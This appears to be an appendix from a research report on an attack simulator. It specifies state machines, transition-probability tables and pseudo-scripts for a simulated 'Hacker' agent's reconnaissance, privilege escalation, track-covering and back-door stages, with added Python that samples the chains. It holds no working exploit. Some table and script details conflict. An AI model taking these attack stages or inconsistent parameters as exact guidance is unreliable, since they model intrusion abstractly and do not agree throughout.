22  | RE   |           |              | UE  |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1
23  | RE   |           |              | End |  0  |  0  |  0  | 0.3 |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
24  | UE   | R_UE_Do   | R_UE_Entry   | UE  |  0  |  0  |  0  |  0  | 0.7 |  0  |  0   |  0   |  0   |  0   |  0   |  0
25  | UE   |           |              | ABE |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1
26  | UE   |           |              | End |  0  |  0  |  0  |  0  | 0.3 |  0  |  0   |  0   |  0   |  0   |  0   |  0
27  | ABE  | R_ABE_Do  | R_ABE_Entry  | ABE |  0  |  0  |  0  |  0  |  0  | 0.7 |  0   |  0   |  0   |  0   |  0   |  0
28  | ABE  |           |              | End |  0  |  0  |  0  |  0  |  0  | 0.3 |  0   |  0   |  0   |  0   |  0   |  0
29  | ABE  |           |              | End |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1

5.  Transition  conditions.  Absent. 
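The transition table above and the common "Do_Script" of state machine A, which calls TransitionSelect(Step.Objective, Step.SMname, Step.xState, Step.Condition, Step.yState), together define how the Hacker Agent picks its next reconnaissance state for a given intention. The block below is an added example, not the Attack Simulator's code: it embeds rows 6 to 29 of the R table as printed, reads the twelve weight columns as the transition weights under intentions 1 to 12 (an assumption consistent with the "Relevant intentions" list and the diagonal 0.7/0.3 pattern), validates that every reachable state has a complete outgoing distribution, and simulates one pass from R1 to End. Since rows 1 to 5 are absent from the page, the validation reports R1 as incomplete for the intentions those rows would have served.

```python
import math
import random

# Added example (not the project's code): rows 6..29 of the R (Reconnaissance)
# transition table from Appendix 1 as (No., from, to, [w1 .. w12]), where w_k
# is the transition weight under relevant intention k (assumed column meaning).
# Rows 1..5 are not on the page, so R1 has no complete distribution for
# intentions 1..3 and 7..12; check_table() surfaces exactly that.
R_TABLE = [
    ( 6, "R1",  "IO",  [0, 0, 0, 0, 0, 0, 0.16, 0.16, 0.16, 0.16, 0.16, 0.16]),
    ( 7, "R1",  "RE",  [0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]),
    ( 8, "R1",  "UE",  [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]),
    ( 9, "R1",  "ABE", [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]),
    (10, "IH",  "IH",  [0.7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (11, "IH",  "IS",  [0, 0, 0, 0, 0, 0, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6]),
    (12, "IH",  "IO",  [0, 0, 0, 0, 0, 0, 0.4, 0.4, 0.4, 0.4, 0.4, 0.4]),
    (13, "IH",  "End", [0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (14, "IS",  "IS",  [0, 0.7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (15, "IS",  "IO",  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
    (16, "IS",  "End", [0, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (17, "IO",  "IO",  [0, 0, 0.7, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (18, "IO",  "CI",  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
    (19, "IO",  "End", [0, 0, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
    (20, "CI",  "RE",  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
    (21, "RE",  "RE",  [0, 0, 0, 0.7, 0, 0, 0, 0, 0, 0, 0, 0]),
    (22, "RE",  "UE",  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
    (23, "RE",  "End", [0, 0, 0, 0.3, 0, 0, 0, 0, 0, 0, 0, 0]),
    (24, "UE",  "UE",  [0, 0, 0, 0, 0.7, 0, 0, 0, 0, 0, 0, 0]),
    (25, "UE",  "ABE", [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
    (26, "UE",  "End", [0, 0, 0, 0, 0.3, 0, 0, 0, 0, 0, 0, 0]),
    (27, "ABE", "ABE", [0, 0, 0, 0, 0, 0.7, 0, 0, 0, 0, 0, 0]),
    (28, "ABE", "End", [0, 0, 0, 0, 0, 0.3, 0, 0, 0, 0, 0, 0]),
    (29, "ABE", "End", [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]),
]
FIRST_STATE = "R1"  # the auxiliary first state of machine R


def outgoing(state, intention):
    """Positive-weight transitions leaving `state` under `intention` (1..12)."""
    col = intention - 1
    return [(to, w[col]) for _, frm, to, w in R_TABLE if frm == state and w[col] > 0]


def check_table(intention):
    """Walk the states reachable from R1 under `intention` and return those whose
    outgoing weights do not sum to 1 (incomplete or mis-typed table rows)."""
    bad, seen, todo = [], set(), [FIRST_STATE]
    while todo:
        state = todo.pop()
        if state in seen or state == "End":
            continue
        seen.add(state)
        edges = outgoing(state, intention)
        if not math.isclose(sum(w for _, w in edges), 1.0, abs_tol=1e-9):
            bad.append(state)
        todo.extend(to for to, _ in edges)
    return sorted(bad)


def transition_select(state, intention, rng):
    """Weighted random choice of the next state, the role TransitionSelect plays
    in Do_Script. Step.Condition is not modelled: the page states
    'Transition conditions. Absent.' for this machine."""
    edges = outgoing(state, intention)
    if not edges:
        raise ValueError(f"no transition from {state} under intention {intention}")
    return rng.choices([to for to, _ in edges], weights=[w for _, w in edges])[0]


def run_scenario(intention, seed=0, max_steps=100):
    """Simulate one macro-level pass through machine R, from R1 until End."""
    rng = random.Random(seed)
    state, path = FIRST_STATE, [FIRST_STATE]
    while state != "End" and len(path) <= max_steps:
        state = transition_select(state, intention, rng)
        path.append(state)
    return path


if __name__ == "__main__":
    for k in (1, 4, 7):
        print(f"intention {k}: incomplete states {check_table(k)}")
    print("intention 7 path:", " -> ".join(run_scenario(7)))
    print("intention 4 path:", " -> ".join(run_scenario(4, seed=1)))
```

Under intention 7 every visible row from IO onward has a single weight-1 successor, so the simulated path is the fixed chain R1, IO, CI, RE, UE, ABE, End; under intention 4 the agent enters RE and then stays there with weight 0.7 per step before terminating, which is the self-loop/exit pattern every state in the table follows for "its own" intention.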
6. Scripts.

Script of the agent “Hacker” behaviour in the state R1 of the state machine R

Entry action (R_R1_Entry):
Log.Create();
Log.A = "R"; Log.S = "R1";
Log.DebugInfo = "A => R => R1";
Log.C = "Intermediate_State_R1";
Log.Type = 0;

Do action (R_R1_Do):
Step.xState = "R1";
Step.Condition = 0;
CALLSCRIPT( Do_script );

Transitions (Condition / Next state / Action):
Step.yState = "IH"  / IH
Step.yState = "IS"  / IS
Step.yState = "IO"  / IO
Step.yState = "RE"  / RE
Step.yState = "UE"  / UE
Step.yState = "ABE" / ABE

Exit action: none


Script of the agent “Hacker” behaviour in the state IH of the state machine R

  Entry action (R_IH_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "IH";
    Log.Description = "Identification of Hosts";
    Log.DebugInfo = "A => R => IH";
    Log.C = "Nonterminal_State_4";
    Log.Type = 2;
    AUTO( IH );

  Do action (R_IH_Do):
    Step.xState = "IH";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "IH"  -> IH
    Step.yState = "IS"  -> IS
    Step.yState = "IO"  -> IO
    Step.yState = "End" -> End

  Exit action: none


Script of the agent “Hacker” behaviour in the state IS of the state machine R

  Entry action (R_IS_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "IS";
    Log.Description = "Identification of Services";
    Log.DebugInfo = "A => R => IS";
    Log.C = "Nonterminal_State_6";
    Log.Type = 2;
    AUTO( IS );

  Do action (R_IS_Do):
    Step.xState = "IS";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "IH"  -> IH
    Step.yState = "IS"  -> IS
    Step.yState = "IO"  -> IO
    Step.yState = "End" -> End

  Exit action: none

Script of the agent “Hacker” behaviour in the state IO of the state machine R

  Entry action (R_IO_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "IO";
    Log.Description = "Identification of Operating system";
    Log.DebugInfo = "A => R => IO";
    Log.C = "Nonterminal_State_8";
    Log.Type = 2;
    AUTO( IO );

  Do action (R_IO_Do):
    Step.xState = "IO";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "IO"  -> IO
    Step.yState = "CI"  -> CI
    Step.yState = "End" -> End

  Exit action: none


Script of the agent “Hacker” behaviour in the state CI of the state machine R

  Entry action (R_CI_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "CI";
    Log.Description = "Collecting of Additional Information";
    Log.DebugInfo = "A => R => CI";
    Log.C = "Nonterminal_State_9";
    Log.Type = 2;
    AUTO( CI );

  Do action (R_CI_Do):
    Step.xState = "CI";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "RE" -> RE

  Exit action: none


Script of the agent “Hacker” behaviour in the state RE of the state machine R

  Entry action (R_RE_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "RE";
    Log.Description = "Shared Resource Enumeration";
    Log.DebugInfo = "A => R => RE";
    Log.C = "Nonterminal_State_10";
    Log.Type = 2;
    AUTO( RE );

  Do action (R_RE_Do):
    Step.xState = "RE";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "RE"  -> RE
    Step.yState = "UE"  -> UE
    Step.yState = "End" -> End

  Exit action: none
Script of the agent “Hacker” behaviour in the state UE of the state machine R

  Entry action (R_UE_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "UE";
    Log.Description = "Users and groups Enumeration";
    Log.DebugInfo = "A => R => UE";
    Log.C = "Nonterminal_State_12";
    Log.Type = 2;
    AUTO( UE );

  Do action (R_UE_Do):
    Step.xState = "UE";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "UE"  -> UE
    Step.yState = "ABE" -> ABE
    Step.yState = "End" -> End

  Exit action: none

Script of the agent “Hacker” behaviour in the state ABE of the state machine R

  Entry action (R_ABE_Entry):
    Log.Create();
    Log.A = "R";
    Log.S = "ABE";
    Log.Description = "Applications and Banners Enumeration";
    Log.DebugInfo = "A => R => ABE";
    Log.C = "Nonterminal_State_14";
    Log.Type = 2;
    AUTO( ABE );

  Do action (R_ABE_Do):
    Step.xState = "ABE";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "UE"  -> UE
    Step.yState = "ABE" -> ABE
    Step.yState = "End" -> End

  Exit action: none
III. State machine I (Implantation and threat realization)

1. Identifier of the node to which the state machine corresponds: (1 2)

2. State machine diagram.

3. Main parameters of the state machine.

  State machine name:   I
  Relevant intentions:  1,2,3,4,5,6,7,8,9,10,11,12
  States:               I1, GAR, EP, GAD, TR, CT, CBD, End
  First state:          I1
  Nonterminal states:   GAR, EP, GAD, TR, CT, CBD
  Terminal states:      -
  Auxiliary states:     I1
4. Parameters of transitions.

Columns: N (row), CS (current state), script names (Entry / Do), NS (next state), Cond (transition condition, see item 5), and the transition probability p_i for each intention i = 1..12 (1 IH, 2 IS, 3 IO, 4 RE, 5 UE, 6 ABE, 7 GAR, 8 EP, 9 CVR, 10 IVR, 11 AVR, 12 CBD).

 N | CS  | Scripts (Entry / Do)     | NS  | Cond | 1   2   3   4   5   6   7   8   9   10  11  12
   |     |                          |     |      | IH  IS  IO  RE  UE  ABE GAR EP  CVR IVR AVR CBD
 0 | I   |                          | I1  |  -   | 0   0   0   0   0   0   1   1   1   1   1   1
 1 | I1  | I_I1_Entry / I_I1_Do     | GAR |  -   | 0   0   0   0   0   0   1   1   1   1   0   1
 2 | I1  |                          | TR  |  -   | 0   0   0   0   0   0   0   0   0   0   1   0
 3 | GAR | I_GAR_Entry / I_GAR_Do   | EP  |  -   | 0   0   0   0   0   0   0   0.7 0.5 0.5 0   0.4
 4 | GAR |                          | GAD |  -   | 0   0   0   0   0   0   0   0   0.2 0.2 0   0.2
 5 | GAR |                          | TR  |  -   | 0   0   0   0   0   0   0   0   0.3 0.3 0   0
 6 | GAR |                          | CT  |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.2
 7 | GAR |                          | CBD |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.2
 8 | GAR |                          | End |  -   | 0   0   0   0   0   0   1   0.3 0   0   0   0
 9 | EP  | I_EP_Entry / I_EP_Do     | GAD |  -   | 0   0   0   0   0   0   0   0   0.4 0.4 0   0.4
10 | EP  |                          | TR  |  -   | 0   0   0   0   0   0   0   0   0.6 0.6 0   0
11 | EP  |                          | CT  |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.2
12 | EP  |                          | CBD |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.4
13 | EP  |                          | End |  -   | 0   0   0   0   0   0   0   1   0   0   0   0
14 | GAD | I_GAD_Entry / I_GAD_Do   | TR  |  -   | 0   0   0   0   0   0   0   0   1   1   0   0
15 | GAD |                          | CT  |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.6
16 | GAD |                          | CBD |  -   | 0   0   0   0   0   0   0   0   0   0   0   0.4
17 | TR  | I_TR_Entry / I_TR_Do     | CT  |  -   | 0   0   0   0   0   0   0   0   0.2 0.2 0   0
18 | TR  |                          | CBD |  -   | 0   0   0   0   0   0   0   0   0.4 0.4 0   0
19 | TR  |                          | End |  -   | 0   0   0   0   0   0   0   0   0.4 0.4 1   0
20 | CT  | I_CT_Entry / I_CT_Do     | CBD |  -   | 0   0   0   0   0   0   0   0   0.4 0.4 0   1
21 | CT  |                          | End |  -   | 0   0   0   0   0   0   0   0   0.6 0.6 0   0
22 | CT  |                          | End |  1   | 0   0   0   0   0   0   0   0   1   1   0   1
23 | CBD | I_CBD_Entry / I_CBD_Do   | CT  |  -   | 0   0   0   0   0   0   0   0   0.6 0.6 0   0.6
24 | CBD |                          | End |  -   | 0   0   0   0   0   0   0   0   0.4 0.4 0   0.4
25 | CBD |                          | End |  2   | 0   0   0   0   0   0   0   0   1   1   0   1

5. Transition conditions.

  Cond = 1 : Step.PrevState = "CBD"
  Cond = 2 : Step.PrevState = "CT"
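Read by intention, the table above is a small Markov chain per intention, with the two conditional rows acting as a guard against the state machine bouncing between CT and CBD forever. The Python below is an added example, not code from the report: it encodes the non-zero entries of the state machine I table, checks that for every (current state, condition, intention) triple the outgoing probabilities sum to 1, and samples an attack trajectory for a given intention, reproducing the Step.Condition logic of I_CT_Do and I_CBD_Do. Function names and the tuple encoding of rows are my own; intention numbers follow the table's columns (7 = GAR, ..., 11 = AVR, 12 = CBD). The same encoding serves the R, IH and SPIH tables, which have the same column layout.

```python
import random

# Intention numbering used in the transition tables (columns 1..12).
INTENTIONS = ["IH", "IS", "IO", "RE", "UE", "ABE",
              "GAR", "EP", "CVR", "IVR", "AVR", "CBD"]

# Rows of the state machine I table as (current state, next state, cond,
# {intention number: probability}); zero entries are omitted.
I_TABLE = [
    ("I1", "GAR", 0, {7: 1, 8: 1, 9: 1, 10: 1, 12: 1}),
    ("I1", "TR", 0, {11: 1}),
    ("GAR", "EP", 0, {8: 0.7, 9: 0.5, 10: 0.5, 12: 0.4}),
    ("GAR", "GAD", 0, {9: 0.2, 10: 0.2, 12: 0.2}),
    ("GAR", "TR", 0, {9: 0.3, 10: 0.3}),
    ("GAR", "CT", 0, {12: 0.2}),
    ("GAR", "CBD", 0, {12: 0.2}),
    ("GAR", "End", 0, {7: 1, 8: 0.3}),
    ("EP", "GAD", 0, {9: 0.4, 10: 0.4, 12: 0.4}),
    ("EP", "TR", 0, {9: 0.6, 10: 0.6}),
    ("EP", "CT", 0, {12: 0.2}),
    ("EP", "CBD", 0, {12: 0.4}),
    ("EP", "End", 0, {8: 1}),
    ("GAD", "TR", 0, {9: 1, 10: 1}),
    ("GAD", "CT", 0, {12: 0.6}),
    ("GAD", "CBD", 0, {12: 0.4}),
    ("TR", "CT", 0, {9: 0.2, 10: 0.2}),
    ("TR", "CBD", 0, {9: 0.4, 10: 0.4}),
    ("TR", "End", 0, {9: 0.4, 10: 0.4, 11: 1}),
    ("CT", "CBD", 0, {9: 0.4, 10: 0.4, 12: 1}),
    ("CT", "End", 0, {9: 0.6, 10: 0.6}),
    ("CT", "End", 1, {9: 1, 10: 1, 12: 1}),     # Cond 1: previous state was CBD
    ("CBD", "CT", 0, {9: 0.6, 10: 0.6, 12: 0.6}),
    ("CBD", "End", 0, {9: 0.4, 10: 0.4, 12: 0.4}),
    ("CBD", "End", 2, {9: 1, 10: 1, 12: 1}),    # Cond 2: previous state was CT
]


def condition(state, prev_state):
    """Step.Condition as computed in I_CT_Do and I_CBD_Do; 0 elsewhere."""
    if state == "CT" and prev_state == "CBD":
        return 1
    if state == "CBD" and prev_state == "CT":
        return 2
    return 0


def outgoing(table, state, cond, intention):
    """(next state, probability) pairs that apply in this state/condition."""
    return [(ns, p[intention]) for cs, ns, c, p in table
            if cs == state and c == cond and p.get(intention, 0) > 0]


def stochastic_violations(table, intentions=range(7, 13)):
    """(state, cond, intention) triples whose outgoing probabilities do not
    sum to 1. A sum of 0 means the state is unreachable for that intention."""
    bad = []
    for cs, c in sorted({(cs, c) for cs, _, c, _ in table}):
        for i in intentions:
            total = sum(p for _, p in outgoing(table, cs, c, i))
            if total and abs(total - 1) > 1e-9:
                bad.append((cs, c, i))
    return bad


def sample_trajectory(table, intention, seed, first="I1", limit=50):
    """Random walk from the first state until End, driven by the table."""
    rng = random.Random(seed)
    path, prev = [first], None
    while path[-1] != "End" and len(path) < limit:
        cur = path[-1]
        choices = outgoing(table, cur, condition(cur, prev), intention)
        if not choices:
            break  # no row for this intention: dead end in the table
        states, weights = zip(*choices)
        prev, nxt = cur, rng.choices(states, weights)[0]
        path.append(nxt)
    return path


if __name__ == "__main__":
    print(stochastic_violations(I_TABLE))          # [] for the table above
    print(sample_trajectory(I_TABLE, 12, seed=3))  # e.g. I1 -> GAR -> ... -> End
```

For intention 11 (AVR) the walk is deterministic (I1, TR, End), as the table prescribes; for intention 12 (CBD) the conditional rows guarantee that CT and CBD never follow each other more than once before End.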

6. Scripts.

Script of the agent “Hacker” behaviour in the state I1 of the state machine I

  Entry action (I_I1_Entry):
    Log.Create();
    Log.A = "I";
    Log.S = "I1";
    Log.DebugInfo = "A => I => I1";
    Log.C = "Intermediate_State_I1";
    Log.Type = 0;

  Do action (I_I1_Do):
    Step.xState = "I1";
    Step.Condition = 0;
    Step.PrevState = "I1";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "GAR" -> GAR
    Step.yState = "TR"  -> TR

  Exit action: none
Script of the agent “Hacker” behaviour in the state GAR of the state machine I

  Entry action (I_GAR_Entry):
    Log.Create();
    Log.A = "I";
    Log.S = "GAR";
    Log.Description = "Getting Access To Resources";
    Log.DebugInfo = "A => I => GAR";
    Log.C = "Nonterminal_State_16";
    Log.Type = 2;
    AUTO( GAR );

  Do action (I_GAR_Do):
    Step.xState = "GAR";
    Step.Condition = 0;
    Step.PrevState = "GAR";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "EP"  -> EP
    Step.yState = "GAD" -> GAD
    Step.yState = "TR"  -> TR
    Step.yState = "CT"  -> CT
    Step.yState = "CBD" -> CBD
    Step.yState = "End" -> End

  Exit action: none

Script of the agent “Hacker” behaviour in the state EP of the state machine I

  Entry action (I_EP_Entry):
    Log.Create(); Log.A = "I";
    Log.S = "EP";
    Log.Description = "Escalating Privilege";
    Log.DebugInfo = "A => I => EP";
    Log.C = "Nonterminal_State_26";
    Log.Type = 2;
    AUTO( EP );

  Do action (I_EP_Do):
    Step.xState = "EP";
    Step.Condition = 0;
    Step.PrevState = "EP";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "GAD" -> GAD
    Step.yState = "TR"  -> TR
    Step.yState = "CT"  -> CT
    Step.yState = "CBD" -> CBD
    Step.yState = "End" -> End

  Exit action: none


Script of the agent “Hacker” behaviour in the state GAD of the state machine I

  Entry action (I_GAD_Entry):
    Log.Create(); Log.A = "I"; Log.S = "GAD";
    Log.Description = "Gaining Additional Data";
    Log.DebugInfo = "A => I => GAD";
    Log.C = "Nonterminal_State_27"; Log.Type = 2; AUTO( GAD );

  Do action (I_GAD_Do):
    Step.xState = "GAD"; Step.Condition = 0;
    Step.PrevState = "GAD";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "TR"  -> TR
    Step.yState = "CT"  -> CT
    Step.yState = "CBD" -> CBD

  Exit action: none


Script of the agent “Hacker” behaviour in the state TR of the state machine I

  Entry action (I_TR_Entry):
    Log.Create();
    Log.A = "I";
    Log.S = "TR";
    Log.Description = "Threat Realization";
    Log.DebugInfo = "A => I => TR";
    Log.C = "Nonterminal_State_28";
    Log.Type = 2;
    AUTO( TR );

  Do action (I_TR_Do):
    Step.xState = "TR";
    Step.Condition = 0;
    Step.PrevState = "TR";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "CT"  -> CT
    Step.yState = "CBD" -> CBD
    Step.yState = "End" -> End

  Exit action: none

Script of the agent “Hacker” behaviour in the state CT of the state machine I

  Entry action (I_CT_Entry):
    Log.Create();
    Log.A = "I";
    Log.S = "CT";
    Log.Description = "Covering Tracks";
    Log.DebugInfo = "A => I => CT";
    Log.C = "Nonterminal_State_32";
    Log.Type = 2;
    AUTO( CT );

  Do action (I_CT_Do):
    Step.xState = "CT";
    Step.Condition = 0;
    IF ( Step.PrevState = "CBD" ) THEN Step.Condition = 1; ENDIF;
    Step.PrevState = "CT";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "CBD" -> CBD
    Step.yState = "End" -> End

  Exit action: none


Script of the agent “Hacker” behaviour in the state CBD of the state machine I

  Entry action (I_CBD_Entry):
    Log.Create(); Log.A = "I"; Log.S = "CBD";
    Log.Description = "Creating Back Doors";
    Log.DebugInfo = "A => I => CBD";
    Log.C = "Nonterminal_State_32";
    Log.Type = 2;
    AUTO( CBD );

  Do action (I_CBD_Do):
    Step.xState = "CBD";
    Step.Condition = 0;
    IF ( Step.PrevState = "CT" ) THEN Step.Condition = 1; ENDIF;
    Step.PrevState = "CBD";
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "CT"  -> CT
    Step.yState = "End" -> End

  Exit action: none


IV. State machine IH (Identification of Hosts)

1. Identifier of the node to which the state machine corresponds: (1 1 1)

2. State machine diagram.

3. Main parameters of the state machine.

  State machine name:   IH
  Relevant intentions:  1,2,3,4,5,6,7,8,9,10,11,12
  States:               IH1, DC, SPIH, IH2, End
  First state:          IH1
  Nonterminal states:   SPIH
  Terminal states:      DC
  Auxiliary states:     IH1, IH2

4. Parameters of transitions.

Columns: N, CS, script names (Entry / Do), NS, Cond, and the transition probability for each intention 1..12 (1 IH, 2 IS, 3 IO, 4 RE, 5 UE, 6 ABE, 7 GAR, 8 EP, 9 CVR, 10 IVR, 11 AVR, 12 CBD).

 N | CS   | Scripts (Entry / Do)       | NS   | Cond | 1   2   3   4   5   6   7   8   9   10  11  12
   |      |                            |      |      | IH  IS  IO  RE  UE  ABE GAR EP  CVR IVR AVR CBD
 0 | IH   |                            | IH1  |  -   | 1   0   0   0   0   0   1   1   1   1   1   1
 1 | IH1  | IH_IH1_Entry / IH_IH1_Do   | DC   |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 2 | IH1  |                            | SPIH |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 3 | DC   | IH_DC_Entry / IH_DC_Do     | DC   |  -   | 0.3 0   0   0   0   0   0.3 0.3 0.3 0.3 0.3 0.3
 4 | DC   |                            | IH2  |  -   | 0.7 0   0   0   0   0   0.7 0.7 0.7 0.7 0.7 0.7
 5 | SPIH | IH_SPIH_Entry / IH_SPIH_Do | SPIH |  -   | 0.3 0   0   0   0   0   0.3 0.3 0.3 0.3 0.3 0.3
 6 | SPIH |                            | IH2  |  -   | 0.7 0   0   0   0   0   0.7 0.7 0.7 0.7 0.7 0.7
 7 | IH2  | IH_IH2_Entry / IH_IH2_Do   | IH1  |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 8 | IH2  |                            | End  |  -   | 0.5 0   0   0   0   0   0.3 0.3 0.3 0.3 0.3 0.3
5.  Transition  conditions.  Absent. 

6. Scripts.

Script of the agent “Hacker” behaviour in the state IH1 of the state machine IH

  Entry action (IH_IH1_Entry):
    Log.Create();
    Log.A = "IH"; Log.S = "IH1";
    Log.DebugInfo = "A => R => IH => IH1";
    Log.C = "Intermediate_State_IH1";
    Log.Type = 0;

  Do action (IH_IH1_Do):
    Step.xState = "IH1";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "DC"   -> DC
    Step.yState = "SPIH" -> SPIH

  Exit action: none
Script of the agent “Hacker” behaviour in the state DC of the state machine IH

  Entry action (IH_DC_Entry):
    dC = 0.6; Log.Create(); Log.A = "IH"; Log.S = "DC";
    Log.Description = "Network Ping Sweeps";
    Log.DebugInfo = "A => R => IH => DC";
    Log.ResultComment = "IP-addresses"; Log.C = "Terminal_State_1"; Log.Type = 1;
    CALLSCRIPT( ip_address );

  Do action (IH_DC_Do):
    Step.xState = "DC";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "DC"  -> DC
    Step.yState = "IH2" -> IH2

  Exit action: none

Script of the agent “Hacker” behaviour in the state SPIH of the state machine IH

  Entry action (IH_SPIH_Entry):
    Log.Create(); Log.A = "IH"; Log.S = "SPIH"; Log.Description = "Port Scanning";
    Log.DebugInfo = "A => R => IH => SPIH"; Log.C = "Nonterminal_State_5";
    Log.Type = 2; AUTO( SPIH );

  Do action (IH_SPIH_Do):
    Step.xState = "SPIH"; Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "SPIH" -> SPIH
    Step.yState = "IH2"  -> IH2

  Exit action: none

Script of the agent “Hacker” behaviour in the state IH2 of the state machine IH

  Entry action (IH_IH2_Entry):
    Log.Create(); Log.A = "IH"; Log.S = "IH2";
    Log.DebugInfo = "A => R => IH => IH2";
    Log.C = "Intermediate_State_IH2"; Log.Type = 0;

  Do action (IH_IH2_Do):
    Step.xState = "IH2";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "IH1" -> IH1
    Step.yState = "End" -> End

  Exit action: none


Common script for all terminal states of the state machines IH and SPIH

  Entry action: none

  Do action (ip_address):
    IF ( xHost.Exist( xHost.IP <> "" ) ) THEN
      REPEAT
        AttRandom( dC, bX );
        IF ( bX ) THEN
          IF ( NOT Host.Exist( Host.IP = xHost.IP ) ) THEN
            Host.Create(); Host.IP = xHost.IP;
          ENDIF;
          LogResult.Create(); LogResult.ID = Log.ID; LogResult.Result = Host.IP;
        ENDIF;
      UNTIL ( xHost.Next() );
    ENDIF;

  Transitions: none

  Exit action: none


V. State machine SPIH (Port Scanning)

1. Identifier of the node to which the state machine corresponds: (1 1 1 2)

2. State machine diagram.

3. Main parameters of the state machine.

  State machine name:   SPIH
  Relevant intentions:  1,2,3,4,5,6,7,8,9,10,11,12
  States:               SPIH1, STIH, SSIH, SPIH2, End
  First state:          SPIH1
  Nonterminal states:   -
  Terminal states:      STIH, SSIH
  Auxiliary states:     SPIH1, SPIH2

4. Parameters of transitions.

Columns: N, CS, script names (Entry / Do), NS, Cond, and the transition probability for each intention 1..12 (1 IH, 2 IS, 3 IO, 4 RE, 5 UE, 6 ABE, 7 GAR, 8 EP, 9 CVR, 10 IVR, 11 AVR, 12 CBD).

 N | CS    | Scripts (Entry / Do)           | NS    | Cond | 1   2   3   4   5   6   7   8   9   10  11  12
   |       |                                |       |      | IH  IS  IO  RE  UE  ABE GAR EP  CVR IVR AVR CBD
 0 | SPIH  |                                | SPIH1 |  -   | 1   0   0   0   0   0   1   1   1   1   1   1
 1 | SPIH1 | SPIH_SPIH1_Entry / SPIH_SPIH1_Do | STIH  |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 2 | SPIH1 |                                | SSIH  |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 3 | STIH  | SPIH_STIH_Entry / SPIH_STIH_Do | STIH  |  -   | 0.3 0   0   0   0   0   0.3 0.3 0.3 0.3 0.3 0.3
 4 | STIH  |                                | SPIH2 |  -   | 0.7 0   0   0   0   0   0.7 0.7 0.7 0.7 0.7 0.7
 5 | SSIH  | SPIH_SSIH_Entry / SPIH_SSIH_Do | SSIH  |  -   | 0.3 0   0   0   0   0   0.3 0.3 0.3 0.3 0.3 0.3
 6 | SSIH  |                                | SPIH2 |  -   | 0.7 0   0   0   0   0   0.7 0.7 0.7 0.7 0.7 0.7
 7 | SPIH2 | SPIH_SPIH2_Entry / SPIH_SPIH2_Do | SPIH1 |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
 8 | SPIH2 |                                | End   |  -   | 0.5 0   0   0   0   0   0.5 0.5 0.5 0.5 0.5 0.5
5.  Transition  conditions.  Absent. 


6. Scripts.

Script of the agent “Hacker” behaviour in the state SPIH1 of the state machine SPIH

  Entry action (SPIH_SPIH1_Entry):
    Log.Create();
    Log.A = "SPIH";
    Log.S = "SPIH1";
    Log.DebugInfo = "A => R => IH => SPIH => SPIH1";
